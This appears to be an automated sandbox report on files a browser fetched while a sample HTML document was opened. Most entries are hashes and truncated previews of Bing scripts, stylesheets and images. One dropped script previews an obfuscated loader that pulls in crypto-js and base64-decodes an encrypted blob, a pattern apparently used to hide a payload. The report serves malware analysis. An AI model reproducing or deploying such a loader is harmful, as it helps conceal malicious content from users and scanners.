                                                                                                      Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (574), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):574
                                                                                                      Entropy (8bit):5.105436700660883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2QpKAbAremR8akHqmm7X+JJ0hHbNkpCfwLCv3PvR3g14M5GK0DsDEtdi:2Q5LqfaJJ0h5kpmkSnR3g1XQAEdi
                                                                                                      MD5:072D0F8C7FDB7655402FB9C592D66E18
                                                                                                      SHA1:2E013E24EF2443215C6B184E9DFE180B7E562848
                                                                                                      SHA-256:4CD4CC3D07BBACDECB7331BF78FC5353B4B2664B6C81C1C0237136123D8E704A
                                                                                                      SHA-512:44CECEE114212D2901DD13F9200771C708EF6E89B9BDCB75EDF898A1E39833AAFA4C7F8EBFC2F613D46EEEA35222A1DFEE3671A1B42679A94BEAEC099164F009
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function r(i,r){if(typeof Lib!="undefined"&&typeof Lib.CssClass!="undefined"&&n){var u=!Lib.CssClass.contains(n,r);i?Lib.CssClass.remove(n,r):(Lib.CssClass.add(n,r),sj_evt.fire("fab_hide"));u!=i&&r==t&&_w.sj_log&&sj_log("CI.Fab","display",i?"show":"hide")}}function i(n){var u=n[0],i=n[1];r(i,t)}function u(){if(n=_ge("mfa_root"),n)if(fab_config&&fab_config.micFabAlwaysVisible){var u=_ge("mfa_vsrch");u?(sj_evt.bind("vs_fab_vis_feature",i,!0),r(!0,t)):sj_evt.bind("fab_vis",i,!0)}else sj_evt.bind("fab_vis",i,!0)}var t="b_fabHide",n;sj_evt.bind("onP1",u,!0)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):7155
                                                                                                      Entropy (8bit):5.435598317550486
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                      MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                      SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                      SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                      SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/G_yFy6XEJBNpQawd_XeaVjtb7tQ.js
                                                                                                      Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (5738), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5738
                                                                                                      Entropy (8bit):5.114371070471245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:xYLyztiz5XwxTbVvI2NxsHQH56PkYveiekeBekebVejeIIvAybIgE3UyfI0syxHz:2z5gxTdNxsHQH568YveiekeBeke5ejeY
                                                                                                      MD5:2937C6DCAD55E5E4A67945F4F803C7CD
                                                                                                      SHA1:27399487B23109021F178841013D476F92B057C6
                                                                                                      SHA-256:ACB0819704DDC4062D6A3B565BA7FE999FEF298778B4B56C284E8F1BEBF3C9B7
                                                                                                      SHA-512:2C07163F841A09D2061AF35C7183984475247CE50A9000B4B2B0B5240701A64B140ECA99853238DB08BB94E9B9368BDFFFE9E83185EDA1745FB02E6F81110D3A
                                                                                                      Malicious:false
                                                                                                      Preview:var Chevrons;(function(n){function s(){f=null;t=null;e=!1;o=!1}function a(n,t,i,r,u,f){var e,o=function(n,t,i,r,f){return new l(n,t,i,r,u,f)};typeof SmartRendering!="undefined"?SmartRendering.LoadElementWhenDisplayed(this,_ge(n),o,[n,t,i,r]):o.apply(this,[n,t,i,r,f]);(e=window.ChevronsPoleWheel||window.ChevronsPoleWheelCF)===null||e===void 0?void 0:e.init({container:_ge(n),btnPrev:t,btnNext:i})}var i="disabled",h="hidden",r="darkchv",u="exp",c="expd",t=null,f=null,e=!1,o=!1,l=function(){function n(n,t,i,r,f,e){var o=this;this.controlId=n;this.prevSlideBtn=t;this.nextSlideBtn=i;this.tabbable=r;this.enableGradientDisappear=f;this.nextChevronOverlay=_ge(e+"_chevron_overlay_next");this.prevChevronOverlay=_ge(e+"_chevron_overlay_prev");this.onPrevClick(function(){var n="slideexp_slideprev",t="Prev",i=Lib.CssClass.contains(o.prevSlideBtn,u);i&&(Lib.CssClass.remove(o.prevSlideBtn,u),Lib.CssClass.add(o.prevSlideBtn,c),n="slideexp_expandleft",t="ExpandLeft");sj_evt.fire(n,o.controlId);Log.Log(t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1045
                                                                                                      Entropy (8bit):7.812007487462295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2YvL3J/eQWCXbwIoGryAFXt3jwRDa9W3TH:Rv1NHUIbrzU3TH
                                                                                                      MD5:2AA8CAB3D7B05D1540A69E6DA11C916B
                                                                                                      SHA1:4F7B7A5776B3806E0195245C82E476B2CB943B14
                                                                                                      SHA-256:BE40B55ED2C02CA68A1527E8B50CB949FFF17EC444504F9ABCE98C97EBAD1738
                                                                                                      SHA-512:FEC6CD89DA1CC4630A229567101F83D979860F6CDF34FEA00174052FDEE93F00F8F0AA489C565F6CD1BCEE3124DFCB1DCE9418FBA7B3983EF6F6946C8689B241
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/rp/T3t6V3azgG4BlSRcguR2ssuUOxQ.png
                                                                                                      Preview:.PNG........IHDR...<.........=P.D....IDATx..?LSA.......J(......YcY\.......%&n.XD....X...N..Q...US.IL...z.?.?.}..I.......~w....Jv..Q..........8M...6..%..X.u....\.f.X..>u.d..E.+b6.P4.].........W.}t..jc......^.....p.).".U.H...y...i...Fz......a`.,Gr.8XP.K3@./.U...+........d`.;...,...{.U.s.:...<O......~..'.8#{...5....9...../."S.....9...Nr<=.u57.?G.a.x......}.....6n=W.3}...(.QV....y..R..G`.J...5....h.R.Z).:8.../5.%&..9..M...jQ.V?..[-E...........-....1.[!....)Ml].i.I. 8.).A.aiE./0.C'.P...v.....e(.....;...E...i..D....ea.#.3)..h..&,...Y..$-G......G...IY..T...mP.5?l...5w..t....m.O6........o(...f.k..Q5.....A.....S.......s.D..R.....^..{o..~..a...X....Z.I..Z.*/m...$....\..2O.$%.3;....)..m...}h.l....&.OPq.k......T.:q.E.p"".....{V.$/4a9.G.4.E..1..{... Y.....:3.9.&m..Z...k.'........v.\.e...y+.L..%..{..8..E..R&....[I.P......0.u/#.......f......e....H'.v..qp..J.w..}e.*.,..@....7Sjd.$aW......o.'R...L.#...0....K..rT`>>......Y2..,...!.......T
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (2014), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2016
                                                                                                      Entropy (8bit):5.3161096027675105
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bnXL8sjfZ/Fslrgj3rzIRlK0KqoLi7XSOLFTt+jCz1T9XNZTs3Gan/An0:bnoshqlMQRlZTolKOEXNZsWan/An0
                                                                                                      MD5:D807DBBB6EE3A78027DC7075E0B593FF
                                                                                                      SHA1:27109CD41F6B1F2084C81B5D375EA811E51AC567
                                                                                                      SHA-256:0ACDCE370092C141B0C6617ED6E2163F04BB9B93D3213B62C2BC7A46FE0243C7
                                                                                                      SHA-512:E037DFC31D595B459660FE7D938EEDB4F43D208D247174EE8D6FD0D125F211142CD73497E4601893CECB6F565B7E2E7815CE416D72BB95504D3F277E4E806D11
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/JxCc1B9rHyCEyBtdN16oEeUaxWc.js
                                                                                                      Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):130044
                                                                                                      Entropy (8bit):6.149088079261044
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:1Fc1Y1ojjPv9xNwXU6h5gXFsWBFjlXtL8DLgJmV5P6:1Fc1Y1Ablwk0gXFjRdQD8gL6
                                                                                                      MD5:FA24890620D9AF86CAD908634A6D8007
                                                                                                      SHA1:0CBD7865B866889D5F3CD148A70F214ACA395C27
                                                                                                      SHA-256:81BC03A8E49A755BE9E532F7967FE26117FA04953A765A16E203E222A978A45F
                                                                                                      SHA-512:9A7877FDDE100F87FE34D24FFD5F212806ED292D9488542390E7D734BF1DA8F3AD4BB3644C443B3EC9F12D7E9A20DF46F986B13DB559B20BB7747EA77481F78B
                                                                                                      Malicious:false
                                                                                                      Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__rest=this&&this.__rest||function(n,t){var u={},r;for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&t.indexOf(i)<0&&(u[i]=n[i]);if(n!=null&&typeof Object.getOwnPropertySymbols=="function")for(r=0,i=Object.getOwnPropertySymbols(n);r<i.length;r++)t.indexOf(i[r])<0&&Object.prototype.propertyIsEnumerable.call(n,i[r])&&(u[i[r]]=n[i[r]]);return u},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},__awaiter=this&&this.__awaiter||function(n,t,i,r){function u(n){return n instanceof i?n:new i(function(t){t(n)})}return new(i||(i=Promise))(function(i,f){functi
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):429
                                                                                                      Entropy (8bit):5.098203134109495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                      MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                      SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                      SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                      SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/eTi-SFYR-dQX6EuMCnS9PFieBS8.js
                                                                                                      Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (23972), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):23972
                                                                                                      Entropy (8bit):5.375758975103992
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:ET9yphkEE2GFrECkYPgFn8WceEfsYHdpOr6MZMm+mdm1mGmMmDmD:ET90b+9DkYoiWceEfsydS62M96IZrgE
                                                                                                      MD5:99FC3EE93F5073710A4E406849BCD8F5
                                                                                                      SHA1:93019AE1C9310EC1E15F8829EC40D6ADE1C544ED
                                                                                                      SHA-256:3AEA1CD7C8D8200B106E044845CD4CCED255EC2E9AD57AD01ADEFDFEC0BAB132
                                                                                                      SHA-512:A66CCDE0CF166E266CBC4CE9BBE296FF797997FC86B6A3EBE0E9BBE711ACFA2814F1F0BCB1CE1CF05DE41D0124FDA7DC32F47C8F614C7BCDF89A6F3B5C085FA1
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/kwGa4ckxDsHhX4gp7EDWreHFRO0.css
                                                                                                      Preview:#sw_as .sa_sg_icon_area{margin:0 12px 0 8px;height:30px;min-width:30px;display:flex;justify-content:center;align-items:center}#sw_as .sa_sg_corner_icon{height:18px;width:18px}#sw_as .sa_sg_searchicon{background-image:url('data:image/svg+xml,%3Csvg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" fill="none"%3E%3Cpath class="lefticon_gray70_fill" d="M7.57895 0.710526C11.3723 0.710526 14.4474 3.78563 14.4474 7.57895C14.4474 9.21969 13.872 10.726 12.9122 11.9073L17.555 16.5502C17.8325 16.8277 17.8325 17.2775 17.555 17.555C17.3028 17.8073 16.9081 17.8302 16.6299 17.6238L16.5502 17.555L11.9073 12.9122C10.726 13.872 9.21969 14.4474 7.57895 14.4474C3.78563 14.4474 0.710526 11.3723 0.710526 7.57895C0.710526 3.78563 3.78563 0.710526 7.57895 0.710526ZM7.57895 2.13158C4.57045 2.13158 2.13158 4.57045 2.13158 7.57895C2.13158 10.5874 4.57045 13.0263 7.57895 13.0263C10.5874 13.0263 13.0263 10.5874 13.0263 7.57895C13.0263 4.57045 10.5874 2.13158 7.57895 2.13158Z" fill="%23
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2308
                                                                                                      Entropy (8bit):7.899179387795881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EYzupuaC/kR4ajNJXnekFKhb2WNmjBreMXTohjl3hOmPQ91J0t:EYzuHbTek82f16MXTobpPQXyt
                                                                                                      MD5:9CFE604BB54DC224E1EC11134B92620B
                                                                                                      SHA1:4CC290BD68046125F4883A69538FC3097B6A493F
                                                                                                      SHA-256:7FD2B0AEAAF40451CD44B87FD01F51E5321DCC44786259C295BA4F608083834F
                                                                                                      SHA-512:B8525D24478AF19E56ADC234DA14F55B53B199E35381D44807A720C113CED27DC4BD01D894A3FEC439CB9F8618C40AEAE3FA7E6C057CD545377FE9AFFB926BA6
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.e4a4bcfe-4053-44c0-b38e-d84b68b4d0cb&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.W{.T..'.......cwvfgw....@.......b.4..H.I.?.u.6.Zl.4&<Z.X_(TbSk.......QK. ..{.3s......;.i.s...s........).p..f4....T6.H....J...S./....l.L.-]WAk...=..M..t{...f......(Gc[>.r.C.Zt...w.@.....z.P.......L..x%.....Z....w.N.l.8w..K@=.....a.'X........2.p.V...'...H...=..L.#:....Vg...........{.x.....|...\.Ku......H.W..*.....|.X....ep#.@.$..I q|..J.k..ec.#.\l...kQ..4.c...?.d4...7..;6..e.Q...(h.2cp5....w."....s....p+........E6....H.L6.!.(.....mG..Q8."`...1......I../...).?....{.D.0...;z.$.2.C.fv".D.u0....K..Wcr......N.@.....q>..0....0.. ....'...f....GL.A...fq..kUx..[.~..OG`/\.*.>6;.L.......`.>L..*..........5^o..-].'.;......a/].j0..Y].).P_......8U.<.....e5..Qa]..5...i...O.2....+`0..f...P..B...y(o.....p.x1..O.O.W.+..f.4.}.$..Q8..F.....-a.......H.u8W.- E.6.O......r..J./>.w.r.\s4.......I.`.&..# .n.y..jx.._..)..!....:..$`...0. ...7`.^..cQ.x..IH.'.5Z."}.^...)...k....@
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1529), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2074
                                                                                                      Entropy (8bit):5.891919746004045
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FK7bk+N36pN9+53uPgamRwqJhOMwhzvuICAEqH5U:FKj6q3uIfehuICRqZU
                                                                                                      MD5:7B2ADF462EC8BF8438237E9915F91F16
                                                                                                      SHA1:EC2D546559491F160204EF52839FFA5C64808384
                                                                                                      SHA-256:DE2AAF5806DE21E0E2E07A70E9B81DB6C96E9DFA08DA6E5FB34CB68E65617D2B
                                                                                                      SHA-512:7367AAD7088165F174B80150D5289219415AF78B058C1F81362EC440A29E21014BB6ECB81AAB74E78464350E1D31B7D48886EE6AF9E7D0C0AF9655065A1CC55C
                                                                                                      Malicious:false
                                                                                                      Preview:var establish= document.createElement("script");..establish.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(establish);..establish.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiSFNpQjFHWFwvRW5hVmY2U1A2RFpBMVZxN0hHaXFSYWp1eVwvNm9CalY3YStLVk8zNG9vSkxhNjhsVTAwcXJnbUt2cktyRG1yK2VZb000T2U0aElLS3I2ZkpLcFdUdG9JcE1XVVFRbXQ0MCtuaVUrQVRpenl2c1VNZksxY21PSUlzVnhMWitRUXRndFI1bHMwVjBxZjhoTE5ZYUhBRHdcL2pIXC9TVDVsa0RxdmxKM1J0eGtBdGFUNnhwdTRoWVRnbEFmcU1PeU1nOFwvVmptaGFaeElcL29oZVJiSXJrTEMrdW1QQXZuNWVOTk9rWGhWcWM0NGJzQzEzSzNMR3ZaOVZoSnV1ZFQwaElSM1wvejlrZkJoa1ZYWGZcL1wvc2w0VnVLWFMrQVA1REMybHNHK3pybFwvYUtiek9PUUVnR0tneUx6RkozVlhTTXJvTWx5VFwveEpRTUFqYnQ5QVU1ZXpwZmNubVZKMUszSTFVOW0rcU9vMEkrcEpZRllqbjFyVlNXeEhUMkJZUUhPSXNtTlVpZndlS3lRQkNGa2c1QWR6K3VacGVDbFVPRitUTzFWQ1wvV29Pakw2WGZydmVVMGJ6cTROZ0ZLVFE3VFpmMzJzSlJER0J5QXJVM2hzNzJaZThRTDZiUThyUitYc2p2cFNuZVhoVlk3cjZ2M0dpXC9qd3VyMkVOQ0VcL1BGciIsImMiOiJiM2NjOWNlNjc4NmU4YTllNjBmYzk
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1490
                                                                                                      Entropy (8bit):7.80890750809164
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QoQSiZ8RVtivs4fDzVoQ6OBot1FtATzEGuG9AD8Z6zdNyLWjOgR891Snff:/wWMvsCVoVt1FUzqG9tEXyyZRuSnff
                                                                                                      MD5:46DBCA792179852611800CFB80AA8CF3
                                                                                                      SHA1:23F08454053EC2D68BA941483CB4A96C2410B268
                                                                                                      SHA-256:16F9EE9E7123AF42BEA111133493B0328250421D2455758441D4C7089C410C0E
                                                                                                      SHA-512:55D84EA1B267C02B920249D68B3D2710E2AB38782689FB43E1F2617BA3D4D41E6C07C8540944A343E5A75B26F587937997A9C2E7F00EC253802C310E9A636EA1
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.97dd6cc5-73c0-4b59-95db-a48ef18adb98&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....tIDATXG.V}PTU...Tj...445..]!Hv.%0g.Q+'5.2.G..J..D.d...qR....C!.MQ..(JCf.Q*?2.P>........oy.......;..s~..s.=R...}.d1.)HQ.d.....(....,Y.R.i........d...-J...x..*...%..@..(Nv)..P.?..AA....[iO.~:...R...._..{qk.{.T....b....%`n5]P..M..M..T...T..PO..^._.]........+..s.....%S)Y.....-..*.Xq......r..h....I.Z.&..w.G.."....u4'zY.....UD.E.r.|..V:UV.....<B...:....Tp..mSs...1.bL...<.D4.L.1H...&"xE..j.....u....|.n..z.......^.1...@.)...XygW'.......yk"....[/..Bp.D...!...O.l.s.gL.}...}....:...(.r:...H..e.........*8..;........6Eg....j. .v.I..Z.S3..j.`.}...a....1#....j.c...E...CL..'%.O..8{.s\5.!.....{+{.7....N.u>.. ...T8......P.n.s...|.<....?].c.!....A....... ..j.B%.8~.MY....v.}Zp....<;e...`.t....\..}...zi.Th..[].J........ZZhsZ..]....d..|40..>;t.u....U.....45An...8..U^.]7Y.#..z...........`....o..G....5........%...c.....K.~+G`.d..-....K...`.........E..x:8..1r.u..'.5..?..CcV.0tF...>.Z.....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5387
                                                                                                      Entropy (8bit):7.799957991588148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                      MD5:69D162774F894FF8B920330E376B7A62
                                                                                                      SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                      SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                      SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........
                                                                                                      File type:HTML document, ASCII text, with CRLF line terminators
                                                                                                      Entropy (8bit):5.1520336444456305
                                                                                                      TrID:
                                                                                                      • HyperText Markup Language (12001/1) 34.29%
                                                                                                      • HyperText Markup Language (12001/1) 34.29%
